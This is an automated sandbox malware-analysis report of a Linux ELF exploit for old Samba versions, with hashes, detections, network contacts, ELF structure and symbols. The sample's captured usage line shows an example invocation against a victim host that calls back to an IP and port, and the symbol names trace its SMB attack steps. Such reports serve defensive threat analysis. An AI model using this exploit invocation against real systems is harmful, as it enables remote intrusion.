Edit tour
Linux
Analysis Report
SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf
Overview
General Information
| Sample name: | SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
| Analysis ID: | 1448261 |
| MD5: | 9c4a6db5821b4a390b09223e5047cce7 |
| SHA1: | 0395f1b0a67701763fc5ed8fce748c341a71bcd3 |
| SHA256: | 79f4ad8a9216ca08bef87e8d0d63d2fba931375ea9ac941c205ae577ec8ab5b3 |
| Tags: | elf |
| Infos: | |
 | |
Detection
| Score: | 48 |
| Range: | 0 - 100 |
| Whitelisted: | false |
Signatures
Multi AV Scanner detection for submitted file
Contains symbols related to standard C library sleeps (sometimes used to evade sandboxing)
Executes the "rm" command used to delete files or directories
Classification
| Joe Sandbox version: | 40.0.0 Tourmaline |
| Analysis ID: | 1448261 |
| Start date and time: | 2024-05-28 06:38:52 +02:00 |
| Joe Sandbox product: | CloudBasic |
| Overall analysis duration: | 0h 10m 48s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Cookbook file name: | defaultlinuxfilecookbook.jbs |
| Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
| Analysis Mode: | default |
| Sample name: | SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
| Detection: | MAL |
| Classification: | mal48.linELF@0/0@0/0 |
| Cookbook Comments: |
|
- Max analysis timeout: 600s exceeded, the analysis took too long
| Command: | /tmp/SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
| PID: | 6250 |
| Exit Code: | 0 |
| Exit Code Info: | |
| Killed: | False |
| Standard Output: | Samba < 3.0.20 Zuc by Zuc (zuc@hack.it) Usage: <victim-host> <connectback-ip> <connectback port> <version> Sample: LSA www.victim.com 80.81.82.83 31337 1 |
| Standard Error: |
⊘No yara matches
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Virustotal: | Perma Link | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Classification label: | ||
| Source: | Rm executable: | Jump to behavior | ||
| Source: | Rm executable: | Jump to behavior | ||
| Source: | Symbol name: | ||
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Virtualization/Sandbox Evasion | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 File Deletion | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
⊘No configs have been found
Is Dropped
Number of created Files
Is malicious
InternetThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 5% | ReversingLabs | Linux.Exploit.Remotehack | ||
| 9% | Virustotal | Browse |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
⊘No contacted domains info
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 54.171.230.55 | unknown | United States | 16509 | AMAZON-02US | false | |
| 109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
| 91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
| 91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 54.171.230.55 | Get hash | malicious | Okiru | Browse | ||
| Get hash | malicious | Gafgyt, Mirai | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Muhstik, Tsunami | Browse | |||
| Get hash | malicious | Muhstik, Tsunami | Browse | |||
| Get hash | malicious | Gafgyt, Mirai, Okiru | Browse | |||
| Get hash | malicious | Mirai, Moobot | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Mirai | Browse | |||
| Get hash | malicious | Mirai | Browse | |||
| 109.202.202.202 | Get hash | malicious | Mirai | Browse | ||
| Get hash | malicious | Mirai | Browse | |||
| Get hash | malicious | Mirai, Okiru | Browse | |||
| Get hash | malicious | Okiru | Browse | |||
| Get hash | malicious | Okiru | Browse | |||
| Get hash | malicious | Okiru | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Mirai | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Kaiji | Browse | |||
| 91.189.91.43 | Get hash | malicious | Mirai | Browse | ||
| Get hash | malicious | Mirai, Okiru | Browse | |||
| Get hash | malicious | Okiru | Browse | |||
| Get hash | malicious | Okiru | Browse | |||
| Get hash | malicious | Okiru | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Mirai | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Kaiji | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| 91.189.91.42 | Get hash | malicious | Mirai | Browse | ||
| Get hash | malicious | Mirai | Browse | |||
| Get hash | malicious | Mirai, Okiru | Browse | |||
| Get hash | malicious | Okiru | Browse | |||
| Get hash | malicious | Okiru | Browse | |||
| Get hash | malicious | Okiru | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Mirai | Browse | |||
| Get hash | malicious | Unknown | Browse | |||
| Get hash | malicious | Kaiji | Browse |
⊘No context
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| CANONICAL-ASGB | Get hash | malicious | Mirai | Browse |
| |
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai, Okiru | Browse |
| ||
| Get hash | malicious | Mirai, Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| CANONICAL-ASGB | Get hash | malicious | Mirai | Browse |
| |
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai, Okiru | Browse |
| ||
| Get hash | malicious | Mirai, Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| AMAZON-02US | Get hash | malicious | Mirai | Browse |
| |
| Get hash | malicious | Mirai, Okiru | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | HTMLPhisher | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| INIT7CH | Get hash | malicious | Mirai | Browse |
| |
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Mirai, Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Okiru | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Mirai | Browse |
| ||
| Get hash | malicious | Unknown | Browse |
| ||
| Get hash | malicious | Kaiji | Browse |
|
⊘No context
⊘No context
⊘No created / dropped files found
| File type: | |
| Entropy (8bit): | 4.9056401313215865 |
| TrID: |
|
| File name: | SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
| File size: | 31'124 bytes |
| MD5: | 9c4a6db5821b4a390b09223e5047cce7 |
| SHA1: | 0395f1b0a67701763fc5ed8fce748c341a71bcd3 |
| SHA256: | 79f4ad8a9216ca08bef87e8d0d63d2fba931375ea9ac941c205ae577ec8ab5b3 |
| SHA512: | efe46fcaa0bad618b55d29f2dcb208cd77f0dc6ebe4062338c03b4489e8c44441dfa72b52d1341bac4c1d610eabce368397cce2059a2570464c0c3af918614c2 |
| SSDEEP: | 384:UVBycpjD3JC2+FGa8dAw4ZXZrUhCEejrr02cVAV73/v/ruJ9M2cN8S9h:UmchJCLd8dAnZrUhCtrrtHf8S9h |
| TLSH: | 04E2C4A77241E72AE0A3CB350E534AB5E371B1749723B317AF0946366D126C81F34B8B |
| File Content Preview: | .ELF..............>.....0.@.....@........^..........@.8...@.&.#.........@.......@.@.....@.@.....................................8.......8.@.....8.@...............................................@.......@.....DB......DB........ ..............N.......N`.... |
ELF header | |
|---|---|
| Class: | |
| Data: | |
| Version: | |
| Machine: | |
| Version Number: | |
| Type: | |
| OS/ABI: | |
| ABI Version: | 0 |
| Entry Point Address: | |
| Flags: | |
| ELF Header Size: | 64 |
| Program Header Offset: | 64 |
| Program Header Size: | 56 |
| Number of Program Headers: | 9 |
| Section Header Offset: | 24232 |
| Section Header Size: | 64 |
| Number of Section Headers: | 38 |
| Header String Table Index: | 35 |
| Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
|---|---|---|---|---|---|---|---|---|---|---|
| NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
| .interp | PROGBITS | 0x400238 | 0x238 | 0x1c | 0x0 | 0x2 | A | 0 | 0 | 1 |
| .note.ABI-tag | NOTE | 0x400254 | 0x254 | 0x20 | 0x0 | 0x2 | A | 0 | 0 | 4 |
| .note.gnu.build-id | NOTE | 0x400274 | 0x274 | 0x24 | 0x0 | 0x2 | A | 0 | 0 | 4 |
| .hash | HASH | 0x400298 | 0x298 | 0xa4 | 0x4 | 0x2 | A | 6 | 0 | 8 |
| .gnu.hash | GNU_HASH | 0x400340 | 0x340 | 0x1c | 0x0 | 0x2 | A | 6 | 0 | 8 |
| .dynsym | DYNSYM | 0x400360 | 0x360 | 0x210 | 0x18 | 0x2 | A | 7 | 1 | 8 |
| .dynstr | STRTAB | 0x400570 | 0x570 | 0xc7 | 0x0 | 0x2 | A | 0 | 0 | 1 |
| .gnu.version | VERSYM | 0x400638 | 0x638 | 0x2c | 0x2 | 0x2 | A | 6 | 0 | 2 |
| .gnu.version_r | VERNEED | 0x400668 | 0x668 | 0x30 | 0x0 | 0x2 | A | 7 | 1 | 8 |
| .rela.dyn | RELA | 0x400698 | 0x698 | 0x18 | 0x18 | 0x2 | A | 6 | 0 | 8 |
| .rela.plt | RELA | 0x4006b0 | 0x6b0 | 0x1f8 | 0x18 | 0x2 | A | 6 | 13 | 8 |
| .init | PROGBITS | 0x4008a8 | 0x8a8 | 0x1a | 0x0 | 0x6 | AX | 0 | 0 | 4 |
| .plt | PROGBITS | 0x4008d0 | 0x8d0 | 0x160 | 0x10 | 0x6 | AX | 0 | 0 | 16 |
| .text | PROGBITS | 0x400a30 | 0xa30 | 0x2a74 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
| .fini | PROGBITS | 0x4034a4 | 0x34a4 | 0x9 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
| .rodata | PROGBITS | 0x4034b0 | 0x34b0 | 0x8bb | 0x0 | 0x2 | A | 0 | 0 | 8 |
| .eh_frame_hdr | PROGBITS | 0x403d6c | 0x3d6c | 0xec | 0x0 | 0x2 | A | 0 | 0 | 4 |
| .eh_frame | PROGBITS | 0x403e58 | 0x3e58 | 0x3ec | 0x0 | 0x2 | A | 0 | 0 | 8 |
| .init_array | INIT_ARRAY | 0x604e00 | 0x4e00 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
| .fini_array | FINI_ARRAY | 0x604e08 | 0x4e08 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
| .jcr | PROGBITS | 0x604e10 | 0x4e10 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
| .dynamic | DYNAMIC | 0x604e18 | 0x4e18 | 0x1e0 | 0x10 | 0x3 | WA | 7 | 0 | 8 |
| .got | PROGBITS | 0x604ff8 | 0x4ff8 | 0x8 | 0x8 | 0x3 | WA | 0 | 0 | 8 |
| .got.plt | PROGBITS | 0x605000 | 0x5000 | 0xc0 | 0x8 | 0x3 | WA | 0 | 0 | 8 |
| .data | PROGBITS | 0x6050c0 | 0x50c0 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
| .bss | NOBITS | 0x6050d0 | 0x50d0 | 0x18 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
| .comment | PROGBITS | 0x0 | 0x50d0 | 0x42 | 0x1 | 0x30 | MS | 0 | 0 | 1 |
| .debug_aranges | PROGBITS | 0x0 | 0x5120 | 0x100 | 0x0 | 0x0 | 0 | 0 | 16 | |
| .debug_info | PROGBITS | 0x0 | 0x5220 | 0x31b | 0x0 | 0x0 | 0 | 0 | 1 | |
| .debug_abbrev | PROGBITS | 0x0 | 0x553b | 0x183 | 0x0 | 0x0 | 0 | 0 | 1 | |
| .debug_line | PROGBITS | 0x0 | 0x56be | 0x1e7 | 0x0 | 0x0 | 0 | 0 | 1 | |
| .debug_str | PROGBITS | 0x0 | 0x58a5 | 0x2ad | 0x1 | 0x30 | MS | 0 | 0 | 1 |
| .debug_loc | PROGBITS | 0x0 | 0x5b52 | 0x11b | 0x0 | 0x0 | 0 | 0 | 1 | |
| .debug_ranges | PROGBITS | 0x0 | 0x5c70 | 0xd0 | 0x0 | 0x0 | 0 | 0 | 16 | |
| .shstrtab | STRTAB | 0x0 | 0x5d40 | 0x161 | 0x0 | 0x0 | 0 | 0 | 1 | |
| .symtab | SYMTAB | 0x0 | 0x6828 | 0xb58 | 0x18 | 0x0 | 37 | 58 | 8 | |
| .strtab | STRTAB | 0x0 | 0x7380 | 0x614 | 0x0 | 0x0 | 0 | 0 | 1 |
| Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
|---|---|---|---|---|---|---|---|---|---|---|---|
| PHDR | 0x40 | 0x400040 | 0x400040 | 0x1f8 | 0x1f8 | 1.7277 | 0x5 | R E | 0x8 | ||
| INTERP | 0x238 | 0x400238 | 0x400238 | 0x1c | 0x1c | 3.9408 | 0x4 | R | 0x1 | /lib64/ld-linux-x86-64.so.2 | .interp |
| LOAD | 0x0 | 0x400000 | 0x400000 | 0x4244 | 0x4244 | 5.6972 | 0x5 | R E | 0x200000 | .interp .note.ABI-tag .note.gnu.build-id .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame | |
| LOAD | 0x4e00 | 0x604e00 | 0x604e00 | 0x2d0 | 0x2e8 | 1.7959 | 0x6 | RW | 0x200000 | .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss | |
| DYNAMIC | 0x4e18 | 0x604e18 | 0x604e18 | 0x1e0 | 0x1e0 | 1.5152 | 0x6 | RW | 0x8 | .dynamic | |
| NOTE | 0x254 | 0x400254 | 0x400254 | 0x44 | 0x44 | 3.5218 | 0x4 | R | 0x4 | .note.ABI-tag .note.gnu.build-id | |
| GNU_EH_FRAME | 0x3d6c | 0x403d6c | 0x403d6c | 0xec | 0xec | 4.2646 | 0x4 | R | 0x4 | .eh_frame_hdr | |
| GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x8 | ||
| GNU_RELRO | 0x4e00 | 0x604e00 | 0x604e00 | 0x200 | 0x200 | 1.5236 | 0x4 | R | 0x1 | .init_array .fini_array .jcr .dynamic .got |
| Type | Meta | Value | Tag |
|---|---|---|---|
| DT_NEEDED | sharedlib | libc.so.6 | 0x1 |
| DT_INIT | value | 0x4008a8 | 0xc |
| DT_FINI | value | 0x4034a4 | 0xd |
| DT_INIT_ARRAY | value | 0x604e00 | 0x19 |
| DT_INIT_ARRAYSZ | bytes | 8 | 0x1b |
| DT_FINI_ARRAY | value | 0x604e08 | 0x1a |
| DT_FINI_ARRAYSZ | bytes | 8 | 0x1c |
| DT_HASH | value | 0x400298 | 0x4 |
| DT_GNU_HASH | value | 0x400340 | 0x6ffffef5 |
| DT_STRTAB | value | 0x400570 | 0x5 |
| DT_SYMTAB | value | 0x400360 | 0x6 |
| DT_STRSZ | bytes | 199 | 0xa |
| DT_SYMENT | bytes | 24 | 0xb |
| DT_DEBUG | value | 0x0 | 0x15 |
| DT_PLTGOT | value | 0x605000 | 0x3 |
| DT_PLTRELSZ | bytes | 504 | 0x2 |
| DT_PLTREL | pltrel | DT_RELA | 0x14 |
| DT_JMPREL | value | 0x4006b0 | 0x17 |
| DT_RELA | value | 0x400698 | 0x7 |
| DT_RELASZ | bytes | 24 | 0x8 |
| DT_RELAENT | bytes | 24 | 0x9 |
| DT_VERNEED | value | 0x400668 | 0x6ffffffe |
| DT_VERNEEDNUM | value | 1 | 0x6fffffff |
| DT_VERSYM | value | 0x400638 | 0x6ffffff0 |
| DT_NULL | value | 0x0 | 0x0 |
| Name | Version Info Name | Version Info File Name | Section Name | Value | Size | Symbol Type | Symbol Bind | Symbol Visibility | Ndx |
|---|---|---|---|---|---|---|---|---|---|
| .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | |||
| __gmon_start__ | .dynsym | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
| __libc_start_main | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| atoi | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| close | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| connect | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| exit | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| free | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| gethostbyname | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| htons | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| inet_addr | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| memcpy | GLIBC_2.14 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| memset | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| puts | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| recv | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| send | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| shutdown | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| socket | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| strcpy | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| strdup | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| strlen | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| usleep | GLIBC_2.2.5 | libc.so.6 | .dynsym | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
| .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | |||
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400238 | 0 | SECTION | <unknown> | DEFAULT | 1 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400254 | 0 | SECTION | <unknown> | DEFAULT | 2 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400274 | 0 | SECTION | <unknown> | DEFAULT | 3 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400298 | 0 | SECTION | <unknown> | DEFAULT | 4 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400340 | 0 | SECTION | <unknown> | DEFAULT | 5 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400360 | 0 | SECTION | <unknown> | DEFAULT | 6 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400570 | 0 | SECTION | <unknown> | DEFAULT | 7 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400638 | 0 | SECTION | <unknown> | DEFAULT | 8 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400668 | 0 | SECTION | <unknown> | DEFAULT | 9 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x400698 | 0 | SECTION | <unknown> | DEFAULT | 10 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x4006b0 | 0 | SECTION | <unknown> | DEFAULT | 11 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x4008a8 | 0 | SECTION | <unknown> | DEFAULT | 12 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x4008d0 | 0 | SECTION | <unknown> | DEFAULT | 13 | |
| .symtab | 0x400a30 | 0 | SECTION | <unknown> | DEFAULT | 14 | |||
| GLIBC_2.14 | libc.so.6 | .symtab | 0x4034a4 | 0 | SECTION | <unknown> | DEFAULT | 15 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x4034b0 | 0 | SECTION | <unknown> | DEFAULT | 16 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x403d6c | 0 | SECTION | <unknown> | DEFAULT | 17 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x403e58 | 0 | SECTION | <unknown> | DEFAULT | 18 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x604e00 | 0 | SECTION | <unknown> | DEFAULT | 19 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x604e08 | 0 | SECTION | <unknown> | DEFAULT | 20 | |
| GLIBC_2.2.5 | libc.so.6 | .symtab | 0x604e10 | 0 | SECTION | <unknown> | DEFAULT | 21 | |
| .symtab | 0x604e18 | 0 | SECTION | <unknown> | DEFAULT | 22 | |||
| .symtab | 0x604ff8 | 0 | SECTION | <unknown> | DEFAULT | 23 | |||
| .symtab | 0x605000 | 0 | SECTION | <unknown> | DEFAULT | 24 | |||
| .symtab | 0x6050c0 | 0 | SECTION | <unknown> | DEFAULT | 25 | |||
| .symtab | 0x6050d0 | 0 | SECTION | <unknown> | DEFAULT | 26 | |||
| .symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 27 | |||
| .symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 28 | |||
| .symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 29 | |||
| .symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 30 | |||
| .symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 31 | |||
| .symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 32 | |||
| .symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 33 | |||
| .symtab | 0x0 | 0 | SECTION | <unknown> | DEFAULT | 34 | |||
| .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | |||
| .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | |||
| BINDRequest2nd | .symtab | 0x40163f | 1154 | FUNC | <unknown> | DEFAULT | 14 | ||
| BINDRequestRESPONSE2nd | .symtab | 0x401ac1 | 101 | FUNC | <unknown> | DEFAULT | 14 | ||
| LSA | .symtab | 0x40267c | 3493 | FUNC | <unknown> | DEFAULT | 14 | ||
| NTCreateAndXRequest2nd | .symtab | 0x401398 | 571 | FUNC | <unknown> | DEFAULT | 14 | ||
| NTCreateAndXRequestRESPONSE2nd | .symtab | 0x4015d3 | 108 | FUNC | <unknown> | DEFAULT | 14 | ||
| NegotiateProtocolRequest2nd | .symtab | 0x400be4 | 297 | FUNC | <unknown> | DEFAULT | 14 | ||
| NegotiateProtocolRequestRESPONSE2nd | .symtab | 0x400d0d | 94 | FUNC | <unknown> | DEFAULT | 14 | ||
| SessionSetupAndXRequest2nd | .symtab | 0x400d6b | 214 | FUNC | <unknown> | DEFAULT | 14 | ||
| SessionSetupAndXRequest2ndb | .symtab | 0x400ead | 266 | FUNC | <unknown> | DEFAULT | 14 | ||
| SessionSetupAndXRequest2ndc | .symtab | 0x401023 | 348 | FUNC | <unknown> | DEFAULT | 14 | ||
| SessionSetupAndXRequestRESPONSE2nd | .symtab | 0x400e41 | 108 | FUNC | <unknown> | DEFAULT | 14 | ||
| SessionSetupAndXRequestRESPONSE2ndb | .symtab | 0x400fb7 | 108 | FUNC | <unknown> | DEFAULT | 14 | ||
| SessionSetupAndXRequestRESPONSE2ndc | .symtab | 0x40117f | 108 | FUNC | <unknown> | DEFAULT | 14 | ||
| TreeConnectAndXRequest2nd | .symtab | 0x4011eb | 293 | FUNC | <unknown> | DEFAULT | 14 | ||
| TreeConnectAndXRequestRESPONSE2nd | .symtab | 0x401310 | 136 | FUNC | <unknown> | DEFAULT | 14 | ||
| UniversalMethodFirst | .symtab | 0x401b26 | 647 | FUNC | <unknown> | DEFAULT | 14 | ||
| UniversalMethodFirstRESPONSE | .symtab | 0x401dad | 94 | FUNC | <unknown> | DEFAULT | 14 | ||
| UniversalMethodLast | .symtab | 0x4020f0 | 707 | FUNC | <unknown> | DEFAULT | 14 | ||
| UniversalMethodLastRESPONSE | .symtab | 0x4023b3 | 94 | FUNC | <unknown> | DEFAULT | 14 | ||
| UniversalMethodMiddle | .symtab | 0x401e0b | 647 | FUNC | <unknown> | DEFAULT | 14 | ||
| UniversalMethodMiddleRESPONSE | .symtab | 0x402092 | 94 | FUNC | <unknown> | DEFAULT | 14 | ||
| _DYNAMIC | .symtab | 0x604e18 | 0 | OBJECT | <unknown> | DEFAULT | 22 | ||
| _GLOBAL_OFFSET_TABLE_ | .symtab | 0x605000 | 0 | OBJECT | <unknown> | DEFAULT | 24 | ||
| _IO_stdin_used | .symtab | 0x4034b0 | 4 | OBJECT | <unknown> | DEFAULT | 16 | ||
| _ITM_deregisterTMCloneTable | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
| _ITM_registerTMCloneTable | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
| _Jv_RegisterClasses | .symtab | 0x0 | 0 | NOTYPE | <unknown> | DEFAULT | SHN_UNDEF | ||
| __FRAME_END__ | .symtab | 0x404240 | 0 | OBJECT | <unknown> | DEFAULT | 18 | ||
| __JCR_END__ | .symtab | 0x604e10 | 0 | OBJECT | <unknown> | DEFAULT | 21 | ||
| __JCR_LIST__ | .symtab | 0x604e10 | 0 | OBJECT | <unknown> | DEFAULT | 21 | ||
| __TMC_END__ | .symtab | 0x6050d0 | 0 | OBJECT | <unknown> | HIDDEN | 25 | ||
| __bss_start | .symtab | 0x6050d0 | 0 | NOTYPE | <unknown> | DEFAULT | 26 | ||
| __data_start | .symtab | 0x6050c0 | 0 | NOTYPE | <unknown> | DEFAULT | 25 | ||
| __do_global_dtors_aux | .symtab | 0x400ad0 | 0 | FUNC | <unknown> | DEFAULT | 14 | ||
| __do_global_dtors_aux_fini_array_entry | .symtab | 0x604e08 | 0 | OBJECT | <unknown> | DEFAULT | 20 | ||
| __dso_handle | .symtab | 0x6050c8 | 0 | OBJECT | <unknown> | HIDDEN | 25 | ||
| __frame_dummy_init_array_entry | .symtab | 0x604e00 | 0 | OBJECT | <unknown> | DEFAULT | 19 | ||
